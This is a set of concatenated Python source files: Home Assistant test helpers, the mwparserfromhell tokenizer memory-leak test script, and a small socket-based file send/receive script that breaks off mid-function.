    return hass.data["mqtt"]


# Synchronous wrapper usable from threads other than the event loop's.
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
    """Mock a component is setup.

    :raises AssertionError: if the component is already set up.
    """
    if component in hass.config.components:
        # Bug fix: the original built the AssertionError but never raised
        # it, so duplicate setup went completely unnoticed.
        raise AssertionError(f"Integration {component} is already setup")
    hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
    """Install a mocked Entity Registry on hass and return it."""
    registry = entity_registry.EntityRegistry(hass)
    if mock_entries:
        registry.entities = mock_entries
    else:
        registry.entities = OrderedDict()
    hass.data[entity_registry.DATA_REGISTRY] = registry
    return registry
def mock_area_registry(hass, mock_entries=None):
    """Install a mocked Area Registry on hass and return it."""
    registry = area_registry.AreaRegistry(hass)
    if mock_entries:
        registry.areas = mock_entries
    else:
        registry.areas = OrderedDict()
    hass.data[area_registry.DATA_REGISTRY] = registry
    return registry
def mock_device_registry(hass, mock_entries=None):
    """Install a mocked Device Registry on hass and return it."""
    registry = device_registry.DeviceRegistry(hass)
    if mock_entries:
        registry.devices = mock_entries
    else:
        registry.devices = OrderedDict()
    hass.data[device_registry.DATA_REGISTRY] = registry
    return registry
class MockGroup(auth_models.Group):
    """Mock a group in Home Assistant."""

    def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
        """Mock a group."""
        kwargs = {"name": name, "policy": policy}
        # Only pass id through when given so the model can generate one.
        if id is not None:
            kwargs["id"] = id
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add entry to an auth manager's store."""
        ensure_auth_manager_loaded(auth_mgr)
        # Insert directly into the store, bypassing validation/persistence.
        auth_mgr._store._groups[self.id] = self
        return self
class MockUser(auth_models.User):
    """Mock a user in Home Assistant."""

    def __init__(
        self,
        id=None,
        is_owner=False,
        is_active=True,
        name="Mock User",
        system_generated=False,
        groups=None,
    ):
        """Initialize mock user."""
        kwargs = {
            "is_owner": is_owner,
            "is_active": is_active,
            "name": name,
            "system_generated": system_generated,
            "groups": groups or [],
            "perm_lookup": None,
        }
        # Only pass id through when given so the model can generate one.
        if id is not None:
            kwargs["id"] = id
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add entry to an auth manager's store."""
        ensure_auth_manager_loaded(auth_mgr)
        # Insert directly into the store, bypassing validation/persistence.
        auth_mgr._store._users[self.id] = self
        return self

    def mock_policy(self, policy):
        """Mock a policy for a user."""
        self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
    """Register an auth provider built from config and return it.

    :raises ValueError: when a provider with the same (type, id) key is
        already registered.
    """
    provider = await auth_providers.auth_provider_from_config(
        hass, hass.auth._store, config
    )
    assert provider is not None, "Invalid config specified"
    key = (provider.type, provider.id)
    providers = hass.auth._providers
    if key in providers:
        raise ValueError("Provider already registered")
    providers[key] = provider
    return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
    """Mark an auth manager's store as loaded by seeding default data."""
    backing_store = auth_mgr._store
    if backing_store._users is not None:
        return
    backing_store._set_defaults()
class MockModule:
    """Representation of a fake module."""

    # pylint: disable=invalid-name
    def __init__(
        self,
        domain=None,
        dependencies=None,
        setup=None,
        requirements=None,
        config_schema=None,
        platform_schema=None,
        platform_schema_base=None,
        async_setup=None,
        async_setup_entry=None,
        async_unload_entry=None,
        async_migrate_entry=None,
        async_remove_entry=None,
        partial_manifest=None,
    ):
        """Initialize the mock module.

        Only hooks that are passed in are attached, so loader code can
        probe for their presence just like on a real integration module.
        """
        self.__name__ = f"homeassistant.components.{domain}"
        self.__file__ = f"homeassistant/components/{domain}"
        self.DOMAIN = domain
        self.DEPENDENCIES = dependencies or []
        self.REQUIREMENTS = requirements or []
        # Overlay to be used when generating manifest from this module
        self._partial_manifest = partial_manifest
        if config_schema is not None:
            self.CONFIG_SCHEMA = config_schema
        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema
        if platform_schema_base is not None:
            self.PLATFORM_SCHEMA_BASE = platform_schema_base
        if setup is not None:
            # We run this in executor, wrap it in function
            self.setup = lambda *args: setup(*args)
        if async_setup is not None:
            self.async_setup = async_setup
        if setup is None and async_setup is None:
            # Default to a setup hook that succeeds immediately.
            self.async_setup = mock_coro_func(True)
        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry
        if async_unload_entry is not None:
            self.async_unload_entry = async_unload_entry
        if async_migrate_entry is not None:
            self.async_migrate_entry = async_migrate_entry
        if async_remove_entry is not None:
            self.async_remove_entry = async_remove_entry

    def mock_manifest(self):
        """Generate a mock manifest to represent this module."""
        return {
            **loader.manifest_from_legacy_module(self.DOMAIN, self),
            **(self._partial_manifest or {}),
        }
class MockPlatform:
    """Provide a fake platform."""

    __name__ = "homeassistant.components.light.bla"
    __file__ = "homeassistant/components/blah/light"

    # pylint: disable=invalid-name
    def __init__(
        self,
        setup_platform=None,
        dependencies=None,
        platform_schema=None,
        async_setup_platform=None,
        async_setup_entry=None,
        scan_interval=None,
    ):
        """Initialize the platform.

        Only hooks that are passed in are attached, so platform setup code
        can probe for their presence just like on a real platform module.
        """
        self.DEPENDENCIES = dependencies or []
        if platform_schema is not None:
            self.PLATFORM_SCHEMA = platform_schema
        if scan_interval is not None:
            self.SCAN_INTERVAL = scan_interval
        if setup_platform is not None:
            # We run this in executor, wrap it in function
            self.setup_platform = lambda *args: setup_platform(*args)
        if async_setup_platform is not None:
            self.async_setup_platform = async_setup_platform
        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry
        if setup_platform is None and async_setup_platform is None:
            # Default to a platform setup that succeeds immediately.
            self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
    """EntityPlatform subclass that fills in sensible test defaults."""

    def __init__(
        self,
        hass,
        logger=None,
        domain="test_domain",
        platform_name="test_platform",
        platform=None,
        scan_interval=timedelta(seconds=15),
        entity_namespace=None,
    ):
        """Initialize a mock entity platform."""
        if logger is None:
            logger = logging.getLogger("homeassistant.helpers.entity_platform")
        # Otherwise the constructor will blow up.
        if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
            platform.PARALLEL_UPDATES = 0
        super().__init__(
            hass=hass,
            logger=logger,
            domain=domain,
            platform_name=platform_name,
            platform=platform,
            scan_interval=scan_interval,
            entity_namespace=entity_namespace,
        )
class MockToggleEntity(entity.ToggleEntity):
    """Provide a mock toggle device.

    Every property access and service call is recorded in ``self.calls``
    as (method_name, kwargs) tuples for later inspection.
    """

    def __init__(self, name, state, unique_id=None):
        """Initialize the mock entity."""
        # NOTE(review): unique_id is accepted but never stored — confirm
        # whether callers rely on it.
        self._name = name or DEVICE_DEFAULT_NAME
        self._state = state
        self.calls = []

    @property
    def name(self):
        """Return the name of the entity if any."""
        self.calls.append(("name", {}))
        return self._name

    @property
    def state(self):
        """Return the state of the entity if any."""
        self.calls.append(("state", {}))
        return self._state

    @property
    def is_on(self):
        """Return true if entity is on."""
        self.calls.append(("is_on", {}))
        return self._state == STATE_ON

    def turn_on(self, **kwargs):
        """Turn the entity on."""
        self.calls.append(("turn_on", kwargs))
        self._state = STATE_ON

    def turn_off(self, **kwargs):
        """Turn the entity off."""
        self.calls.append(("turn_off", kwargs))
        self._state = STATE_OFF

    def last_call(self, method=None):
        """Return the last recorded call, optionally filtered by method name."""
        if not self.calls:
            return None
        if method is None:
            return self.calls[-1]
        try:
            return next(call for call in reversed(self.calls) if call[0] == method)
        except StopIteration:
            return None
class MockConfigEntry(config_entries.ConfigEntry):
    """Helper for creating config entries that adds some defaults."""

    def __init__(
        self,
        *,
        domain="test",
        data=None,
        version=1,
        entry_id=None,
        source=config_entries.SOURCE_USER,
        title="Mock Title",
        state=None,
        options=None,
        system_options=None,
        connection_class=config_entries.CONN_CLASS_UNKNOWN,
        unique_id=None,
    ):
        """Initialize a mock config entry.

        ``options`` and ``system_options`` previously defaulted to mutable
        ``{}`` literals shared by every instance constructed without those
        arguments; ``None`` sentinels give each entry its own dict.
        """
        kwargs = {
            "entry_id": entry_id or uuid.uuid4().hex,
            "domain": domain,
            "data": data or {},
            "system_options": {} if system_options is None else system_options,
            "options": {} if options is None else options,
            "version": version,
            "title": title,
            "connection_class": connection_class,
            "unique_id": unique_id,
        }
        # Only forward source/state when given so the base defaults apply.
        if source is not None:
            kwargs["source"] = source
        if state is not None:
            kwargs["state"] = state
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        hass.config_entries._entries.append(self)

    def add_to_manager(self, manager):
        """Test helper to add entry to entry manager."""
        manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
    """Patch load_yaml with a dictionary of yaml files.

    Keys are file names (or suffixes when endswith is True), values the
    YAML text to serve; returns a patcher for the yaml loader's open().
    """
    # Suffix match list. NOTE(review): sorted(key=len) is ascending, so the
    # SHORTEST suffix is tried first, despite the original comment claiming
    # longest-first — confirm which order is intended.
    matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []

    def mock_open_f(fname, **_):
        """Mock open() in the yaml module, used by load_yaml."""
        # Return the mocked file on full match
        if fname in files_dict:
            _LOGGER.debug("patch_yaml_files match %s", fname)
            res = StringIO(files_dict[fname])
            setattr(res, "name", fname)
            return res
        # Match using endswith
        for ends in matchlist:
            if fname.endswith(ends):
                _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
                res = StringIO(files_dict[ends])
                setattr(res, "name", fname)
                return res
        # Fallback for hass.components (i.e. services.yaml)
        if "homeassistant/components" in fname:
            _LOGGER.debug("patch_yaml_files using real file: %s", fname)
            return open(fname, encoding="utf-8")
        # Not found
        raise FileNotFoundError(f"File not found: {fname}")

    return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
    """Return a coro that returns a value or raise an exception."""
    return mock_coro_func(return_value, exception)()


def mock_coro_func(return_value=None, exception=None):
    """Return a coroutine function that returns a value or raises.

    Uses a native ``async def`` instead of ``@asyncio.coroutine``, which is
    deprecated since Python 3.8 and removed in Python 3.11 (the rest of
    this file already uses ``async def``).
    """
    async def coro(*args, **kwargs):
        """Fake coroutine."""
        if exception:
            raise exception
        return return_value

    return coro
@contextmanager
def assert_setup_component(count, domain=None):
    """Collect valid configuration from setup_component.

    - count: The amount of valid platforms that should be setup
    - domain: The domain to count is optional. It can be automatically
      determined most of the time

    Use as a context manager around setup.setup_component
        with assert_setup_component(0) as result_config:
            setup_component(hass, domain, start_config)
            # using result_config is optional
    """
    config = {}

    async def mock_psc(hass, config_input, integration):
        """Mock the prepare_setup_component to capture config."""
        domain_input = integration.domain
        res = await async_process_component_config(hass, config_input, integration)
        # Record the validated config (or None when validation failed).
        config[domain_input] = None if res is None else res.get(domain_input)
        _LOGGER.debug(
            "Configuration for %s, Validated: %s, Original %s",
            domain_input,
            config[domain_input],
            config_input.get(domain_input),
        )
        return res

    assert isinstance(config, dict)
    with patch("homeassistant.config.async_process_component_config", mock_psc):
        yield config
    # After the block: infer the domain when not given, then check count.
    if domain is None:
        assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
            list(config.keys())
        )
        domain = list(config.keys())[0]
    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert (
        res_len == count
    ), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
    """Initialize the recorder with an in-memory database."""
    config = dict(add_config) if add_config else {}
    config[recorder.CONF_DB_URL] = "sqlite://"  # In memory DB
    # Skip real schema migration; irrelevant for an empty in-memory DB.
    with patch("homeassistant.components.recorder.migration.migrate_schema"):
        assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
    """Mock the DATA_RESTORE_CACHE.

    Seeds the restore-state singleton with the given states, serialized
    through JSON so the data matches what real persistence would produce.
    """
    key = restore_state.DATA_RESTORE_STATE_TASK
    data = restore_state.RestoreStateData(hass)
    now = date_util.utcnow()
    last_states = {}
    for state in states:
        restored_state = state.as_dict()
        # Round-trip the attributes through JSON to mimic on-disk storage.
        restored_state["attributes"] = json.loads(
            json.dumps(restored_state["attributes"], cls=JSONEncoder)
        )
        last_states[state.entity_id] = restore_state.StoredState(
            State.from_dict(restored_state), now
        )
    data.last_states = last_states
    _LOGGER.debug("Restore cache: %s", data.last_states)
    assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"

    async def get_restore_state_data() -> restore_state.RestoreStateData:
        return data

    # Patch the singleton task in hass.data to return our new RestoreStateData
    hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
    """Decorator and context manager that mock-installs a dependency.

    While active, sys.modules entries for the root module and any
    requested dotted submodules point at MagicMock objects.
    """

    def __init__(self, root, *args):
        """Initialize decorator."""
        self.root = root
        self.submodules = args

    def __enter__(self):
        """Start mocking and return the root mock module."""

        def resolve(mock, path):
            """Walk the attribute path on the mock iteratively."""
            for part in path:
                mock = getattr(mock, part)
            return mock

        base = MagicMock()
        to_mock = {}
        for tom in self.submodules:
            to_mock[f"{self.root}.{tom}"] = resolve(base, tom.split("."))
        to_mock[self.root] = base
        self.patcher = patch.dict("sys.modules", to_mock)
        self.patcher.start()
        return base

    def __exit__(self, *exc):
        """Stop mocking and restore sys.modules."""
        self.patcher.stop()
        return False

    def __call__(self, func):
        """Apply decorator; the base mock is appended as a final argument."""

        def run_mocked(*args, **kwargs):
            """Run with mocked dependencies."""
            with self as base:
                args = list(args) + [base]
                func(*args, **kwargs)

        return run_mocked
class MockEntity(entity.Entity):
    """Mock Entity class.

    Property values are supplied as keyword arguments; anything not
    supplied falls back to the base Entity implementation via _handle.
    """

    def __init__(self, **values):
        """Initialize an entity."""
        self._values = values
        if "entity_id" in values:
            self.entity_id = values["entity_id"]

    @property
    def name(self):
        """Return the name of the entity."""
        return self._handle("name")

    @property
    def should_poll(self):
        """Return the state of the polling."""
        return self._handle("should_poll")

    @property
    def unique_id(self):
        """Return the unique ID of the entity."""
        return self._handle("unique_id")

    @property
    def state(self):
        """Return the state of the entity."""
        return self._handle("state")

    @property
    def available(self):
        """Return True if entity is available."""
        return self._handle("available")

    @property
    def device_info(self):
        """Info how it links to a device."""
        return self._handle("device_info")

    @property
    def device_class(self):
        """Info how device should be classified."""
        return self._handle("device_class")

    @property
    def unit_of_measurement(self):
        """Info on the units the entity state is in."""
        return self._handle("unit_of_measurement")

    @property
    def capability_attributes(self):
        """Info about capabilities."""
        return self._handle("capability_attributes")

    @property
    def supported_features(self):
        """Info about supported features."""
        return self._handle("supported_features")

    @property
    def entity_registry_enabled_default(self):
        """Return if the entity should be enabled when first added to the entity registry."""
        return self._handle("entity_registry_enabled_default")

    def _handle(self, attr):
        """Return the overridden value for attr, else the base class value."""
        if attr in self._values:
            return self._values[attr]
        return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
    """Mock storage.

    Data is a dict {'key': {'version': version, 'data': data}}
    Written data will be converted to JSON to ensure JSON parsing works.
    """
    if data is None:
        data = {}
    orig_load = storage.Store._async_load

    async def mock_async_load(store):
        """Mock version of load."""
        if store._data is None:
            # No data to load
            if store.key not in data:
                return None
            mock_data = data.get(store.key)
            if "data" not in mock_data or "version" not in mock_data:
                _LOGGER.error('Mock data needs "version" and "data"')
                raise ValueError('Mock data needs "version" and "data"')
            store._data = mock_data
        # Route through original load so that we trigger migration
        loaded = await orig_load(store)
        _LOGGER.info("Loading data for %s: %s", store.key, loaded)
        return loaded

    def mock_write_data(store, path, data_to_write):
        """Mock version of write data."""
        _LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
        # To ensure that the data can be serialized
        data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))

    async def mock_remove(store):
        """Remove data."""
        data.pop(store.key, None)

    # Patch the three Store entry points; the yielded dict doubles as the
    # fake backing storage for inspection by tests.
    with patch(
        "homeassistant.helpers.storage.Store._async_load",
        side_effect=mock_async_load,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store._write_data",
        side_effect=mock_write_data,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store.async_remove",
        side_effect=mock_remove,
        autospec=True,
    ):
        yield data
async def flush_store(store):
    """Make sure all delayed writes of a store are written."""
    # Nothing was ever loaded/queued for this store: nothing to flush.
    if store._data is None:
        return

    # Cancel the pending listeners first, then force the write directly.
    store._async_cleanup_stop_listener()
    store._async_cleanup_delay_listener()
    await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
    """Return the system health info reported by *domain*'s callback."""
    info_callbacks = hass.data["system_health"]["info"]
    callback = info_callbacks[domain]
    return await callback(hass)
def mock_integration(hass, module):
    """Register *module* as a mock integration on *hass*."""
    domain = module.DOMAIN
    integration = loader.Integration(
        hass, f"homeassistant.components.{domain}", None, module.mock_manifest(),
    )

    _LOGGER.info("Adding mock integration: %s", domain)
    integrations = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
    components = hass.data.setdefault(loader.DATA_COMPONENTS, {})
    integrations[domain] = integration
    components[domain] = module
def mock_entity_platform(hass, platform_path, module):
    """Mock an entity platform.

    ``platform_path`` is in the form ``light.hue``; the platform is
    registered as ``hue.light``.
    """
    entity_domain, integration = platform_path.split(".")
    mock_platform(hass, f"{integration}.{entity_domain}", module)
def mock_platform(hass, platform_path, module=None):
    """Mock a platform.

    ``platform_path`` is in the form ``hue.config_flow``.
    """
    domain, _platform = platform_path.split(".")
    integrations = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
    components = hass.data.setdefault(loader.DATA_COMPONENTS, {})

    # Make sure the parent integration exists before attaching the platform.
    if domain not in integrations:
        mock_integration(hass, MockModule(domain))

    _LOGGER.info("Adding mock integration platform: %s", platform_path)
    components[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
    """Return a list that accumulates every *event_name* event fired."""
    captured = []

    @ha.callback
    def _capture(event):
        """Record one fired event."""
        captured.append(event)

    hass.bus.async_listen(event_name, _capture)
    return captured
@ha.callback
def async_mock_signal(hass, signal):
    """Return a list that records the args of every dispatch of *signal*."""
    recorded = []

    @ha.callback
    def _record(*args):
        """Capture the arguments of one dispatch."""
        recorded.append(args)

    hass.helpers.dispatcher.async_dispatcher_connect(signal, _record)
    return recorded
class hashdict(dict):
    """
    hashable dict implementation, suitable for use as a key into other dicts.

    >>> h1 = hashdict({"apples": 1, "bananas":2})
    >>> h2 = hashdict({"bananas": 3, "mangoes": 5})
    >>> h1+h2
    hashdict(apples=1, bananas=3, mangoes=5)
    >>> d1 = {}
    >>> d1[h1] = "salad"
    >>> d1[h1]
    'salad'
    >>> d1[h2]
    Traceback (most recent call last):
    ...
    KeyError: hashdict(bananas=3, mangoes=5)

    based on answers from
    http://stackoverflow.com/questions/1151658/python-hashable-dicts
    """

    def __key(self):
        # Canonical, order-independent identity: sorted (key, value) pairs.
        return tuple(sorted(self.items()))

    def __repr__(self):  # noqa: D105 no docstring
        # FIX: include the class name so repr matches the doctests above
        # (the previous implementation produced only "k=v, ..." and failed
        # its own documented output).
        return "{}({})".format(
            self.__class__.__name__,
            ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key()),
        )

    def __hash__(self):  # noqa: D105 no docstring
        return hash(self.__key())

    def __setitem__(self, key, value):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def __delitem__(self, key):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def clear(self):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def pop(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def popitem(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def setdefault(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def update(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    # update is not ok because it mutates the object
    # __add__ is ok because it creates a new object
    # while the new object is under construction, it's ok to mutate it
    def __add__(self, right):  # noqa: D105 no docstring
        result = hashdict(self)
        dict.update(result, right)
        return result
def assert_lists_same(a, b):
    """Compare two lists, ignoring order."""
    counted_a = collections.Counter(hashdict(item) for item in a)
    counted_b = collections.Counter(hashdict(item) for item in b)
    assert counted_a == counted_b
|
memtest.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Ben Kurtovic <ben.kurtovic@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for memory leaks in the CTokenizer. Python 2 and 3 compatible.
This appears to work mostly fine under Linux, but gives an absurd number of
false positives on OS X. I'm not sure why. Running the tests multiple times
yields different results (tests don't always leak, and the amount they leak by
varies). Increasing the number of loops results in a smaller bytes/loop value,
too, indicating the increase in memory usage might be due to something else.
Actual memory leaks typically leak very large amounts of memory (megabytes)
and scale with the number of loops.
"""
from __future__ import unicode_literals, print_function
from locale import LC_ALL, setlocale
from multiprocessing import Process, Pipe
from os import listdir, path
import sys
import psutil
from mwparserfromhell.compat import py3k
from mwparserfromhell.parser._tokenizer import CTokenizer
if sys.version_info[0] == 2:
    range = xrange  # Python 2: alias the lazy xrange so range behaves as on Py3

# Iterations in the measured phase; leak sizes are reported per loop.
LOOPS = 10000
class Color(object):
    """ANSI escape sequences used to colorize terminal output."""

    GRAY = "\x1b[30;1m"  # progress counter prefix
    GREEN = "\x1b[92m"  # "OK" result
    YELLOW = "\x1b[93m"  # "LEAKING" result
    RESET = "\x1b[0m"  # restore default attributes
class MemoryTest(object):
    """Manages a memory test.

    Loads tokenizer test cases from tests/tokenizer/*.mwtest, runs each
    one in a child process, and compares the child's RSS before and after
    LOOPS tokenizations to flag possible leaks.
    """

    def __init__(self):
        # List of (test_name, input_text) pairs collected by _load().
        self._tests = []
        self._load()

    def _parse_file(self, name, text):
        """Parse one .mwtest file and queue its cases into self._tests."""
        # Cases are separated by a line containing only "---".
        tests = text.split("\n---\n")
        counter = 1
        digits = len(str(len(tests)))
        for test in tests:
            # "label" and "output" are parsed-file fields this memory test
            # never reads; only "name" and "input" are used below.
            data = {"name": None, "label": None, "input": None, "output": None}
            for line in test.strip().splitlines():
                if line.startswith("name:"):
                    data["name"] = line[len("name:"):].strip()
                elif line.startswith("label:"):
                    data["label"] = line[len("label:"):].strip()
                elif line.startswith("input:"):
                    raw = line[len("input:"):].strip()
                    if raw[0] == '"' and raw[-1] == '"':
                        raw = raw[1:-1]
                    # Round-trip through raw_unicode_escape/unicode_escape to
                    # interpret backslash escapes stored in the fixture text.
                    raw = raw.encode("raw_unicode_escape")
                    data["input"] = raw.decode("unicode_escape")
            number = str(counter).zfill(digits)
            fname = "test_{0}{1}_{2}".format(name, number, data["name"])
            self._tests.append((fname, data["input"]))
            counter += 1

    def _load(self):
        """Discover and parse test files (all, or those named via --use)."""
        def load_file(filename):
            # NOTE(review): mode "rU" was removed in Python 3.11 — confirm
            # this script is only run on older interpreters.
            with open(filename, "rU") as fp:
                text = fp.read()
                if not py3k:
                    text = text.decode("utf8")
                # Strip the directory and the ".mwtest" extension.
                name = path.split(filename)[1][:0-len(extension)]
                self._parse_file(name, text)

        root = path.split(path.dirname(path.abspath(__file__)))[0]
        directory = path.join(root, "tests", "tokenizer")
        extension = ".mwtest"
        if len(sys.argv) > 2 and sys.argv[1] == "--use":
            for name in sys.argv[2:]:
                load_file(path.join(directory, name + extension))
            sys.argv = [sys.argv[0]]  # So unittest doesn't try to load these
        else:
            for filename in listdir(directory):
                if not filename.endswith(extension):
                    continue
                load_file(path.join(directory, filename))

    @staticmethod
    def _print_results(info1, info2):
        """Report whether RSS grew beyond a small buffer between snapshots."""
        r1, r2 = info1.rss, info2.rss
        # Allow up to 8 KiB of growth before declaring a leak.
        buff = 8192
        if r2 - buff > r1:
            d = r2 - r1
            p = float(d) / r1
            bpt = d // LOOPS
            tmpl = "{0}LEAKING{1}: {2:n} bytes, {3:.2%} inc ({4:n} bytes/loop)"
            sys.stdout.write(tmpl.format(Color.YELLOW, Color.RESET, d, p, bpt))
        else:
            sys.stdout.write("{0}OK{1}".format(Color.GREEN, Color.RESET))

    def run(self):
        """Run the memory test suite."""
        # Width of the longest test name, for aligned output.
        width = 1
        for (name, _) in self._tests:
            if len(name) > width:
                width = len(name)
        tmpl = "{0}[{1:03}/{2}]{3} {4}: "
        for i, (name, text) in enumerate(self._tests, 1):
            sys.stdout.write(tmpl.format(Color.GRAY, i, len(self._tests),
                                         Color.RESET, name.ljust(width)))
            sys.stdout.flush()
            # Lock-step handshake with _runner: the child warms up, we
            # snapshot memory, it runs LOOPS iterations, we snapshot again.
            parent, child = Pipe()
            p = Process(target=_runner, args=(text, child))
            p.start()
            try:
                proc = psutil.Process(p.pid)
                parent.recv()
                parent.send("OK")
                parent.recv()
                # NOTE(review): psutil >= 2.0 renamed get_memory_info() to
                # memory_info() — confirm the pinned psutil version.
                info1 = proc.get_memory_info()
                sys.stdout.flush()
                parent.send("OK")
                parent.recv()
                info2 = proc.get_memory_info()
                self._print_results(info1, info2)
                sys.stdout.flush()
                parent.send("OK")
            finally:
                # Always reap the child, even if a snapshot failed.
                proc.kill()
            print()
def _runner(text, child):
    """Child-process entry point: tokenize *text* repeatedly.

    Each send/recv pair below pauses the child so the parent can take a
    memory snapshot at a known point (after warm-up and after the
    measured LOOPS iterations).
    """
    r1, r2 = range(250), range(LOOPS)
    # Warm-up phase: let allocator pools and caches reach steady state.
    for i in r1:
        CTokenizer().tokenize(text)
    child.send("OK")
    child.recv()
    child.send("OK")
    child.recv()
    # Measured phase: any growth here is attributed to leaks per loop.
    for i in r2:
        CTokenizer().tokenize(text)
    child.send("OK")
    child.recv()
if __name__ == "__main__":
    # Enable locale-aware "{:n}" number formatting used in the reports.
    setlocale(LC_ALL, "")
    MemoryTest().run()
|
localserver.py | import socket
import tqdm
import os
import time
import multiprocessing
import openpyxl
import threading
from openpyxl import Workbook
import openpyxl as xl;
import schedule
def recvr(h, p):
    """Accept one TCP connection on (h, p) and receive a single file.

    The peer first sends ``<filename><SEPARATOR><filesize>`` and then
    streams the raw file bytes, which are written to the working
    directory.  Returns an error string on failure, None on success.
    """
    SERVER_HOST = h
    SERVER_PORT = p
    BUFFER_SIZE = 4096
    SEPARATOR = "<SEPARATOR>"

    s = socket.socket()
    try:
        s.bind((SERVER_HOST, SERVER_PORT))
    except OSError:
        s.close()
        o = "Unable to bind"
        return o

    # listen() once; the original re-issued it on every loop pass even
    # though only a single connection is ever accepted.
    s.listen(5)
    print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
    client_socket, address = s.accept()
    print(f"[+] {address} is connected.")
    try:
        recd = client_socket.recv(BUFFER_SIZE)
        try:
            received = recd.decode()
        except UnicodeDecodeError:
            # Keep the original (typo included) message: callers compare
            # on the returned string.
            u = "Unable to recieve, Please retake image"
            print(u)
            return u
        filename, filesize = received.split(SEPARATOR)
        # Never trust a peer-supplied path: keep only the basename so a
        # malicious "../../x" header cannot escape the working directory.
        filename = os.path.basename(filename)
        filesize = int(filesize)
        progress = tqdm.tqdm(range(filesize), f"Receiving {filename}",
                             unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "wb") as f:
            for _ in progress:
                bytes_read = client_socket.recv(BUFFER_SIZE)
                if not bytes_read:
                    # Peer closed the connection; transfer complete.
                    break
                f.write(bytes_read)
                progress.update(len(bytes_read))
    finally:
        # The original leaked both sockets on any failure path.
        client_socket.close()
        s.close()
    print("server closed")
    time.sleep(1)
def sendr(port=5003):
    """Send source.xlsx to the receiver host over TCP.

    :param port: destination TCP port.  Defaults to 5003 (the original
        hard-coded value) so existing zero-argument callers keep working;
        the module-level ``Process(target=sendr, args=(su1,))`` can now
        also call it without crashing.
    """
    SEPARATOR = "<SEPARATOR>"
    BUFFER_SIZE = 4096  # send 4096 bytes each time step
    # the ip address or hostname of the server, the receiver
    host = "192.168.0.104"
    # the name of file we want to send, make sure it exists
    filename = "source.xlsx"
    # get the file size
    filesize = os.path.getsize(filename)

    # create the client socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print(f"[+] Connecting to {host}:{port}")
    s.connect((host, port))
    print("[+] Connected.")
    try:
        # Send the real filename and filesize header; the original sent
        # the literal string "(unknown)" as the filename.
